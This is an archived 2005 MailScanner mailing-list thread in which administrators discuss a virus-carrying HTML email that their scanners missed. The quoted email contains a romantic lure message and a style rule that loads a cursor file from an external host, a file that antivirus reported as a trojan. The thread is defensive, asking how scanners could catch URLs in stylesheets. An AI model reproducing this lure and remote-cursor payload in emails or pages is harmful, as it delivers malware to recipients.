Virus in HTML Email Style Sheet

Martin Hepworth martinh at SOLID-STATE-LOGIC.COM
Tue Mar 29 15:34:12 IST 2005


Derek

does ClamAV catch it? If so I recommend running that on you MS machine
as well.

I note that Sophos won't catch this either - their argument is that they
don't parse URL end points only actual content. The problem will be on
the Windows box (should that be the users O/S) and therefore they will
catch it there. (ie the problem's on the desktop so you need protection
where the problem is, but just the gateway).



--
Martin Hepworth
Snr Systems Administrator
Solid State Logic
Tel: +44 (0)1865 842300


Derek Winkler wrote:
> Here's the HTML source for a message that had a virus in it...
>
> Hey Love<br>I reserved us a place at huoston's tonight.<br>starting to be
> hungry already, for you!!<br>Bob
> <br><br><br><br>
> <style>* {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}</style>
>
> When the CURSOR is retrieved it has Trojan.Moo in it according to NAV.
>
> MailScanner did not catch this.
>
> Should there be a disarm URLs in style sheets setting in MailScanner?
>
> Does anyone know of a virus scanner that checks URLs in email as well? I
> thought Clam was doing this.
>
> Thanks,
>
> Derek
>
> ------------------------------------------------------------------
>
> This email and any files transmitted with it are confidential and
> proprietary to Algorithmics Incorporated and its affiliates
> ("Algorithmics").  If received in error, use is prohibited.  Please destroy,
> and notify sender.  Sender does not waive confidentiality or privilege.
> Internet communications cannot be guaranteed to be timely, secure, error or
> virus-free.  Algorithmics does not accept liability for any errors or
> omissions.  Any commitment intended to bind Algorithmics must be reduced to
> writing and signed by an authorized signatory.
>
> ------------------------ MailScanner list ------------------------
> To unsubscribe, email jiscmail at jiscmail.ac.uk with the words:
> 'leave mailscanner' in the body of the email.
> Before posting, read the MAQ (http://www.mailscanner.biz/maq/) and
> the archives (http://www.jiscmail.ac.uk/lists/mailscanner.html).
>
> Support MailScanner development - buy the book off the website!

**********************************************************************

This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.

This footnote confirms that this email message has been swept
for the presence of computer viruses and is believed to be clean.

**********************************************************************

------------------------ MailScanner list ------------------------
To unsubscribe, email jiscmail at jiscmail.ac.uk with the words:
'leave mailscanner' in the body of the email.
Before posting, read the MAQ (http://www.mailscanner.biz/maq/) and
the archives (http://www.jiscmail.ac.uk/lists/mailscanner.html).

Support MailScanner development - buy the book off the website!




More information about the MailScanner mailing list